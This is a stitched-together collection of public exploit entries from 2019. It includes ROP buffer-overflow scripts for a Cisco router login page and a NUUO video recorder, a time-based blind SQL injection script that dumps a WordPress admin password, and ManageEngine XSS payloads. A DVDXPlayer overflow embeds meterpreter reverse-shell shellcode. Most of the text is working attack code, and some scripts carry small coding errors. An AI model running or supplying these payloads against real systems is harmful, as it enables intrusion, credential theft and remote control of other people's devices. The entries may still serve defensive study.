"submit_button=login&submit_type=&gui_action=&default_login=1&wait_time=0&change_action=&enc=1&user=cisco&pwd=UUUUZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZVVVVWWWWXXXXYYYY`printf "\xf8\xaa\x82\x35\x44\x91\x84\x35AAAA\x1c\x81\x80\x35BBBBCCCCDDDDEEEEFFFF\x08\xd3\x83\x35ping 192.168.1.100\x00"`&sel_lang=EN" 'https://192.168.1.1:443/login.cgi' #!/usr/bin/python import requests def banner(): print ''' @0x00string 0000000000000 0000000000000000000 00 00000000000000000000000000000 0000000000000000000000000000000 000000000 0000000000 00000000 0000000000 0000000 000000000000 0000000 000000000000000 000000 000000000 000000 0000000 000000000 000000 000000 000000000 000000 000000 000000000 000000 000000 00000000 000000 000000 000000000 000000 0000000 000000000 0000000 000000 000000000 000000 0000000000000000 0000000 0000000000000 0000000 00000000000 00000000 00000000000 000000000 0000000000000000000000000000000 00000000000000000000000000000 000 0000000000000000000 0000000000000 https://github.com/0x00string/oldays/blob/master/CVE-2019-1663.py ''' def main(): banner() command = "ping 192.168.1.100\x00" print ("Sending exploit to execute [" + command + "]\n") rop = "\xf8\xaa\x82\x35"+"\x44\x91\x84\x35"+"AAAA"+"\x1c\x81\x80\x35"+"BBBB"+"CCCC"+"DDDD"+"EEEE"+"FFFF"+"\x08\xd3\x83\x35" payload = ("Z" * 446) + rop + command url = "https://192.168.1.100:443/login.cgi" data = {'submit_button': 'login','submit_type': '','gui_action': '','default_login': '1','wait_time': '0','change_action': '','enc': '1','user': 'cisco','pwd': payload,'sel_lang': 'EN'} r = requests.post(url, payload=data) if __name__ == "__main__": main()

#!/usr/bin/python # Exploit Title: NUUO NVRMini2 3.9.1 'sscanf' stack overflow # Google Dork: n/a # Date: Advisory Published: Nov 18 # Exploit Author: @0x00string # Vendor Homepage: nuuo.com # Software Link: https://www.nuuo.com/ProductNode.php?node=2 # Version: 3.9.1 and prior # Tested on: 3.9.1 # CVE : CVE-2018-19864 # # [ leading / ] # [ Padding x 335 ] # [ original value at stack pointer + 158 ] # [ padding x 80 ] # [ address of (pop {r3,lr} ; bx lr) ] # [ system() address ] # [ address of (mov r0,sp ; blx r3) ] # [ command to execute ] def banner(): print ''' @0x00string 0000000000000 0000000000000000000 00 00000000000000000000000000000 0000000000000000000000000000000 000000000 0000000000 00000000 0000000000 0000000 000000000000 0000000 000000000000000 000000 000000000 000000 0000000 000000000 000000 000000 000000000 000000 000000 000000000 000000 000000 00000000 000000 000000 000000000 000000 0000000 000000000 0000000 000000 000000000 000000 0000000000000000 0000000 0000000000000 0000000 00000000000 00000000 00000000000 000000000 0000000000000000000000000000000 00000000000000000000000000000 000 0000000000000000000 0000000000000 https://github.com/0x00string/oldays/blob/master/CVE-2018-19864.py ''' def usage (): print ("python script.py <args>\n" " -h, --help: Show this message\n" " -a, --rhost: Target IP address\n" " -b, --rport: Target Port - default 5150\n" " -c, --command: Command to execute\n" "\n" "Example:\n" "python script.py -a 10.10.10.10\n" "python script.py -a 10.10.10.10 -b 1234 -c reboot\n") exit() def main(): rhost = None; rport = "5150"; command = "{/bin/touch,/tmp/hax}" banner() options, remainder = getopt.getopt(sys.argv[1:], 'a:b:c:fh', ['rhost=','rport=','command=','help']) for opt, arg in options: if opt in ('-h', '--help'): usage() elif opt in ('-a','--rhost'): rhost = arg; elif opt in ('-b','--rport'): rport = arg; elif opt in ('-c','--command'): command = arg; print ("Sending exploit to execute [" + command + "]\n") buf = "GET /" + ("Z" * 335) + "\x30\x2a\x17\x45" + ("Y" * 80) + "\x08\xfc\x78\x40" + "\x44\xe0\x17\x40" + "\xcc\xb7\x77\x40" + command + " HTTP/1.1\r\nHost: " + "http://" + rhost + ":" + rport + "\r\n\r\n" sock = socket(AF_INET, SOCK_STREAM) sock.settimeout(30) sock.connect((target_ip,int(target_port))) sock.send(buf) print ("done\n") if __name__ == "__main__": main()

# Exploit Title: AUO Solar Data Recorder - Incorrect Access Control # Date: 2019-04-16 # Exploit Author: Luca.Chiou # Vendor Homepage: https://www.auo.com/zh-TW # Version: AUO Solar Data Recorder all versions prior to v1.3.0 # Tested on: It is a proprietary devices: https://solar.auo.com/en-global/Support_Download_Center/index # CVE: CVE-2019-11367 # 1. Description: # In AUO Solar Data Recorder web page, it's use HTTP Basic Access Authentication. # Once user access the files which are under path http://<host>/protect/, # the website will response the plaintext account and password in WWW-Authenticate attribute. # Attackers is capable to login AUO Solar Data Recorder successfully. # 2. Proof of Concept: # Access the files which are under path http://<host>/protect/ of AUO Solar Data Recorder. # The website use HTTP Basic Access Authentication, # and response the plaintext account and password in WWW-Authenticate attribute. # By using the account and password in HTTP response, # anyone can login AUO Solar Data Recorder successfully.

# -*- coding: utf-8 -*- # Exploit Title: WordPress Plugin Form Maker 1.13.3 - SQL Injection # Date: 22-03-2019 # Exploit Author: Daniele Scanu @ Certimeter Group # Vendor Homepage: https://10web.io/plugins/ # Software Link: https://wordpress.org/plugins/form-maker/ # Version: 1.13.3 # Tested on: Ubuntu 18.04 # CVE : CVE-2019-10866 import requests import time url_vuln = 'http://localhost/wordpress/wp-admin/admin.php?page=submissions_fm&task=display&current_id=2&order_by=group_id&asc_or_desc=' session = requests.Session() dictionary = '@._-$/\\"£%&;§+*1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM' flag = True username = "username" password = "password" temp_password = "" TIME = 0.5 def login(username, password): payload = { 'log': username, 'pwd': password, 'wp-submit': 'Login', 'redirect_to': 'http://localhost/wordpress/wp-admin/', 'testcookie': 1 } session.post('http://localhost/wordpress/wp-login.php', data=payload) def print_string(str): print "\033c" print str def get_admin_pass(): len_pwd = 1 global flag global temp_password while flag: flag = False ch_temp = '' for ch in dictionary: print_string("[*] Password dump: " + temp_password + ch) ch_temp = ch start_time = time.time() r = session.get(url_vuln + ',(case+when+(select+ascii(substring(user_pass,' + str(len_pwd) + ',' + str(len_pwd) + '))+from+wp_users+where+id%3d1)%3d' + str(ord(ch)) + '+then+(select+sleep(' + str(TIME) + ')+from+wp_users+limit+1)+else+2+end)+asc%3b') elapsed_time = time.time() - start_time if elapsed_time >= TIME: flag = True break if flag: temp_password += ch_temp len_pwd += 1 login(username, password) get_admin_pass() print_string("[+] Password found: " + temp_password)

# Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via SiteLookup.do # Date: 2019-06-04 # Exploit Author: Tarantula Team - VinCSS (a member of Vingroup) # Vendor Homepage: https://www.manageengine.com/products/service-desk # Version: Zoho ManageEngine ServiceDesk Plus 9.3 # CVE : CVE-2019-12538 Information Description: An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the SiteLookup.do qc_siteID parameter Attack vector: domain/SiteLookup.do?configID=0&SELECTSITE=qc_siteID"/><svg onload=alert('XSS')>&userConfigID=21111111&SELECTEDSITEID=1&SELECTEDSITENAME= PoC: https://drive.google.com/file/d/1Oo_lC_XCtAiF2Gvx_ZoS8Yqwunc1U_57/view

# Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via SearchN.do # Date: 2019-06-04 # Exploit Author: Tarantula Team - VinCSS (a member of Vingroup) # Vendor Homepage: https://www.manageengine.com/products/service-desk # Version: Zoho ManageEngine ServiceDesk Plus 9.3 # CVE : CVE-2019-12542 An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the SearchN.do userConfigID parameter. Attack vector: domain/SearchN.do?searchText=a&SELECTEDSITEID=1&SELECTEDSITENAME=&configID=0&SELECTSITE=qc_siteID&submitbutton=Go&userConfigID=21111111ucgol"><img src%3da onerror%3dalert('XSS')>qzmm3u7id8z&selectName=Site PoC: https://drive.google.com/file/d/1aJN6GudSd7WWckXWxA5nelM48Xib9eS9/view

# Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via PurchaseRequest.do # Date: 2019-06-04 # Exploit Author: Tarantula Team - VinCSS (a member of Vingroup) # Vendor Homepage: https://www.manageengine.com/products/service-desk # Version: Zoho ManageEngine ServiceDesk Plus 9.3 # CVE : CVE-2019-12543 Information Description: An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the PurchaseRequest.do serviceRequestId parameter. Attack vector: domain/PurchaseRequest.do?operation=getAssociatedPrsForSR&serviceRequestId=g24aj%3Cimg%20src%3da%20onerror%3dalert(%27XSS%27)%3Eqdaxl PoC: https://drive.google.com/file/d/1pHeq446oNonw5ZJ53idKhP8gC-9CZtQW/view

# Exploit Title: DVDXPlayer 5.5 Pro Local Buffer Overflow with SEH # Date: 6-3-2019 # Exploit Author: Kevin Randall # Vendor Homepage: http://www.dvd-x-player.com/download.html#dvdPlayer # Software Link: http://www.dvd-x-player.com/download.html#dvdPlayer # Version: 5.5 Pro # Tested on: Windows 7 # CVE : N/A #!/usr/bin/python ###########Create Shellcode with MSFVenom############################################################################################### ##msfvenom shellcode generate: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.9 LPORT=4444 -b '\x00\x0A\x0D\x1A' -f python ######################################################################################################################################## file_name = "payloadofficial.plf" #######################Copy and Paste Shellcode Here!!########################### buf = "" buf += "\xd9\xe8\xb8\xa0\x7e\x18\xef\xd9\x74\x24\xf4\x5f\x2b" buf += "\xc9\xb1\x56\x31\x47\x18\x83\xef\xfc\x03\x47\xb4\x9c" buf += "\xed\x13\x5c\xe2\x0e\xec\x9c\x83\x87\x09\xad\x83\xfc" buf += "\x5a\x9d\x33\x76\x0e\x11\xbf\xda\xbb\xa2\xcd\xf2\xcc" buf += "\x03\x7b\x25\xe2\x94\xd0\x15\x65\x16\x2b\x4a\x45\x27" buf += "\xe4\x9f\x84\x60\x19\x6d\xd4\x39\x55\xc0\xc9\x4e\x23" buf += "\xd9\x62\x1c\xa5\x59\x96\xd4\xc4\x48\x09\x6f\x9f\x4a" buf += "\xab\xbc\xab\xc2\xb3\xa1\x96\x9d\x48\x11\x6c\x1c\x99" buf += "\x68\x8d\xb3\xe4\x45\x7c\xcd\x21\x61\x9f\xb8\x5b\x92" buf += "\x22\xbb\x9f\xe9\xf8\x4e\x04\x49\x8a\xe9\xe0\x68\x5f" buf += "\x6f\x62\x66\x14\xfb\x2c\x6a\xab\x28\x47\x96\x20\xcf" buf += "\x88\x1f\x72\xf4\x0c\x44\x20\x95\x15\x20\x87\xaa\x46" buf += "\x8b\x78\x0f\x0c\x21\x6c\x22\x4f\x2d\x41\x0f\x70\xad" buf += "\xcd\x18\x03\x9f\x52\xb3\x8b\x93\x1b\x1d\x4b\xa2\x0c" buf += "\x9e\x83\x0c\x5c\x60\x24\x6c\x74\xa7\x70\x3c\xee\x0e" buf += "\xf9\xd7\xee\xaf\x2c\x4d\xe5\x27\x0f\x39\xf9\xbe\xe7" buf += "\x3b\xfa\xd1\xab\xb2\x1c\x81\x03\x94\xb0\x62\xf4\x54" buf += "\x61\x0b\x1e\x5b\x5e\x2b\x21\xb6\xf7\xc6\xce\x6e\xaf" buf += "\x7e\x76\x2b\x3b\x1e\x77\xe6\x41\x20\xf3\x02\xb5\xef" buf += "\xf4\x67\xa5\x18\x63\x87\x35\xd9\x06\x87\x5f\xdd\x80" buf += "\xd0\xf7\xdf\xf5\x16\x58\x1f\xd0\x25\x9f\xdf\xa5\x1f" buf += "\xeb\xd6\x33\x1f\x83\x16\xd4\x9f\x53\x41\xbe\x9f\x3b" buf += "\x35\x9a\xcc\x5e\x3a\x37\x61\xf3\xaf\xb8\xd3\xa7\x78" buf += "\xd1\xd9\x9e\x4f\x7e\x22\xf5\xd3\x79\xdc\x8b\xfb\x21" buf += "\xb4\x73\xbc\xd1\x44\x1e\x3c\x82\x2c\xd5\x13\x2d\x9c" buf += "\x16\xbe\x66\xb4\x9d\x2f\xc4\x25\xa1\x65\x88\xfb\xa2" buf += "\x8a\x11\x0c\xd8\xe3\xa6\xed\x1d\xea\xc2\xee\x1d\x12" buf += "\xf5\xd3\xcb\x2b\x83\x12\xc8\x0f\x9c\x21\x6d\x39\x37" buf += "\x49\x21\x39\x12" ################################################################################# #No Operations# nops = "\x90"*20 shellcode = nops + buf ####Where all the magic happens! :)##################################################################### buffer = "A"* 608 + "\xEB\x06\x90\x90" + "\x2E\x17\x64\x61" + shellcode + "D"*(1384-len(shellcode)) ################################################################################################### plf_file = open(file_name,"w") plf_file.write(buffer) plf_file.close()

# Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via SolutionSearch.do # Date: 2019-06-04 # Exploit Author: Tarantula Team - VinCSS (a member of Vingroup) # Vendor Homepage: https://www.manageengine.com/products/service-desk # Version: Zoho ManageEngine ServiceDesk Plus 9.3 # CVE : CVE-2019-12541 Information Description: An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the SolutionSearch.do searchText parameter. Attack vector: domain/SolutionSearch.do?searchText=1'%3balert('XSS')%2f%2f706z8rz68&selectName=Solutions PoC: https://drive.google.com/file/d/1zXyFpVwAPc0MfcERNmvIdyKLzx0JMA9r/view